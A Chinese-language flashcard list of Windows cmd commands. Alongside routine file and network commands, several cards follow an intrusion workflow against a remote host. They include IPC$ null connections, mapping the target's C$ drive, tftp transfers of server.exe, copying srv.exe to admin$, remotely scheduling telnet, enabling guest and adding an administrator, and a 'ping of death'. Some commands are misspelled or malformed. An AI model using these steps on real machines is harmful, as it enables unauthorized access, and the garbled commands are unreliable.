Windows cmd 命令 Flashcards
显示当前所有环境变量
set
暂停批处理,并显示出:按任意键继续
pause
查看1.txt的访问用户权限列表
cacls 1.txt
设定d:\test.txt 拒绝hijack用户访问
cacls D:\test.txt /D hijack 参数: /D 用户名:设定拒绝某用户访问 /P 用户名:perm:替换指定用户访问权限 /G 用户名:perm:赋予指定用户访问权限 perm有:N-无,R-读,W-写,C-更改(写入),F-完全控制
重启所有Internet服务
iisreset /restart
这是一条命令,/并不是或的意思
显示1.txt的内容
type 1.txt
在批处理文件中添加注释
REM 文本内容
删除映射对方到本地的为H:的映射
net use h: /del
我的ip是192.168.1.6,现在我已經远程登陆192.168.1.8上,要在其上面下载我自己电脑中的d:\server.exe 到192.168.1.8上的c:\server.exe
tftp -i 192.168.1.6 get d:\server.exe c:\server.exe
-i:以二进制传送
查看正在进行的工作
netstat -v
开对方telnet服务
net start telnet
重命名文件1.txt 为2.txt
ren 原名 新名
ren 1.txt 2.txt
查看windows中hijack账户的属性
net user hijack
移动文件c:\hello.txt到d盘
move c:\hello.txt d:\
加参数\y 将取消确认而直接覆盖
在本地系统上启用(禁用)Internet服务
iisreset /enable或/disable
重启win2k计算机
iisreset /reboot
(有提示:“系统将重启”)
把用户hijack添加到组administrator中
net localgroup Administrators hijack /add
ftp上传文件到服务器
ftp ip 端口
默认端口21
参数bin:二进制传送
参数ascii:ascii传送(适用于文本)
某个计划任务id为9527,这项计划已经注册,现在要开启这个计划
at 9527
用guest用户登陆后将密码改为12345
net user guest 12345
向对方主机192.168.1.8发送大小为32字节的数据
ping ip(或域名) 参数: -l 数据包大小 -n 发送数据次数 -t :一直ping
从批处理程序1.bat中调用另一个批处理程序2.bat
call 2.bat
显示系统网络设置
net config
删除目录c:\hello\及目录下所有子目录和文件
del /S /Q c:\\hello\ 或用: rmdir /S /Q c:\\hello\ /S:删除所有子目录和文件 /Q:免确认
查看协议使用情况(如tcp协议)
netstat -p 协议名
netstat -p tcp
查看机器192.168.1.8局域网内开启了哪些共享
net view \192.168.1.8
删除ipc$共享
net share ipc$ /del
向192.168.1.8发送死亡之ping
ping -t -l 65550 192.168.1.8
检查磁盘D并现实状态报告
chkdsk /F D:
加参数/F修复磁盘上的错误
对方ip为192.168.1.8,想要得到对方的时间
net time \192.168.1.8
查看目录下有哪些文件
dir
暂停某服务
net pause 服务名
把guest的密码改为lovechina
net user guest lovechina
强制结束某进程
kill -F 进程名
ipc直接登陆并映射对方C盘到本地的H盘
(用户名:hijack,密码:hello)
net use h: \ip\c$ “密码” /user:”用户名“
将Guest用户激活
net user guest /active:yes
显示当前日期
显示当前时间
date /t、time /t
/t:只显示当前时间,而不必输入新的时间日期
查看或更改本地网络配置情况
netsh
ipc已经登陆,登陆后映射对方C盘到本地H盘
net use h: \ip\c$
查看正在使用的所有协议使用情况
netstat -s
显示内存使用情况
mem
更改cmd.exe的显示命令提示符(把C:\、D:\同意改为EntSky\)
prompt 名称
跟踪路由(数据包)(目标192.168.1.8)
tracert -参数 192.168.1.8
参数:
-w 数字:用于设置超时间隔
远程登陆windows服务器192.168.1.8
telnet 192.168.1.8
默认端口为23
如果对方更改了telnet端口,则:
telnet 192.168.1.8 端口
更改telnet的端口为其他端口
键入tlntadmin,选择3,再选择8,就可以更改端口了
查看端口的网络连接情况
netstat -n
常用netstat -an
批处理问题
将hello world字符串保存到1.txt中
echo “hello world”»_space; 1.txt
删除ipc连接
net use \ip\ipc$ /del
断开连接的共享
net logoff
导出注册表
regedit /e 注册表文件名
查看和处理arp缓存
arp -a将显示全部信息
向192.168.1.8发送文本信息‘你好’
net send 192.168.1.8 “你好”
设置cmd控制台前景和背景颜色
color 颜色值
建立IPC空连接
net use \ip\ipc$ “密码” /user:”用户名”
在aa.txt文件中寻找字符串hello
findstr “hello” aa.txt
查看windows有哪些用户
net user
更改CMD窗口标题名字为hello
title ‘hello’
在屏幕上打印路由信息
route print
停止某个已注册的计划任务(任务id:9527)
at 9527 /delete
更改系统登陆密码为12345
net password 12345
复制本地c:\srv.exe到对方(192.168.1.8)的admin下
copy c:\srv.exe $”>\192.168.1.8\admin$
我的ip是192.168.1.6,现在我已經登陆在192.168.1.8上,要在其上面上传c:\server.exe到我自己的电脑
tftp -i 192.168.1.6 put c:\server.exe
显示以字母p开头的所有环境变量
set p
查找文件hello.txt
find hello.txt
设置当启动,停止或重新启动internet服务时,若发生错误,将重新开机
iisreset /rebootonerror
查看某文件(目录)的属性(如1.txt)
attrib 1.txt
在屏幕上打印“hello world”
echo “hello world”
限制hijack登陆电脑时间为周一至周五的8:00-17:00
之后再设置不限制hijack登陆时间
再设置hijack永远不能登陆
net user hijack/time:m-f,08:00-17:00
net user hijack/time:all
net user hijack/time
连接到IP(192.168.1.6)(属于telnet登陆后的命令)
open 192.168.1.6
查看开启了哪些服务
net start
批处理问题:
打开或关闭echo
echo on或off
使对方(192.168.1.8)在18:20分的时候执行开启telnet命令
at \192.168.1.8 18:20 net start telnet
显示所有Internet服务状态
iisreset /status
停止所有计划任务
at /delete
用参数/yes则不需要确认
逐屏显示输出文件1.txt
more 1.txt
建立IPC非空连接
net use \ip\ipc$ “密码” /user:”用户名”
隐写术命令:
将2.zip隐藏到1.jpg中,生成3.jpg
copy /b 1.jpg+1.zip out.jpg
删除只读文件hello.txt
del -F hello.txt
替换文件
replace 源文件 要被替换的文件
以树行列表显示进程
tlist -t
开启某服务
停止某服务
net start 服务名
net stop 服务名
调出任务管理器
taskmgr
弹出一个窗口显示版本信息
winver
新建用户:hijack密码为hello
net user hijack hello /add
复制c:\1.txt 到d:\new1.txt
copy c:\1.txt d:\new1.txt
参数/y取消确认
若无法停止Internet服务,将不会强制终止Internet服务
iisreset /noforce
在DOS窗口下显示版本信息
ver
从windows中删除用户hijack
net user hijack /delete
推出cmd.exe
exit
参数/B:推出当前批处理脚本,而不是cmd.exe
去掉或添加1.txt的只读属性
attrib 1.txt -R (或+R)
设置环境变量
set 环境变量名=路径
导入注册表
regedit /s 注册表文件名
参数/S:安静模式,无提示
格式化磁盘
format 盘符 /FS:类型
如:Format D: /FS:NTFS
类型有:FAT32,NTFS等
设置本地计算机时间与192.168.1.8主机的时间同步
net time \192.168.1.8 /set
参数/yes:免确认
查看开启了哪些端口
netstat -a
常用netstat -an
以树形结构显示目录
tree
参数-f:递归显示
查看所有的计划任务
at
远程查看用户登陆信息
finger hijack@192.168.1.8
本地C盘下的index.htm复制到192.168.1.8的C盘
copy index.htm \192.168.1.8\c$\index.htm
查看本地开启的共享
net share
对方136-139其中一个端口已开,现在要查看对方最近登陆的用户名(对方ip为192.168.1.8)
nbstat -A 192.168.1.8
注意:参数A要大写
为可执行文件设置一个路径
path 路径\可执行文件名
创建文件夹hello
md hello
新开一个新窗口并最大化(最小化)运行某程序或命令
start calc.exe /mac 或/min
对比1.txt和2.txt,并把不同之处输出到3.txt中
fc 1.txt 2.txt >3.txt
开启ipc$共享
net share ipc$
删除C盘共享
net share c$ /del
批处理问题:
将cmd.exe导向到批处理程序中带标签的行
goto :start
标签必须单独一行,以冒号开头,如:
:start #这就是一个标签
启动(停止)所有Internet服务
iisreset /start 或 stop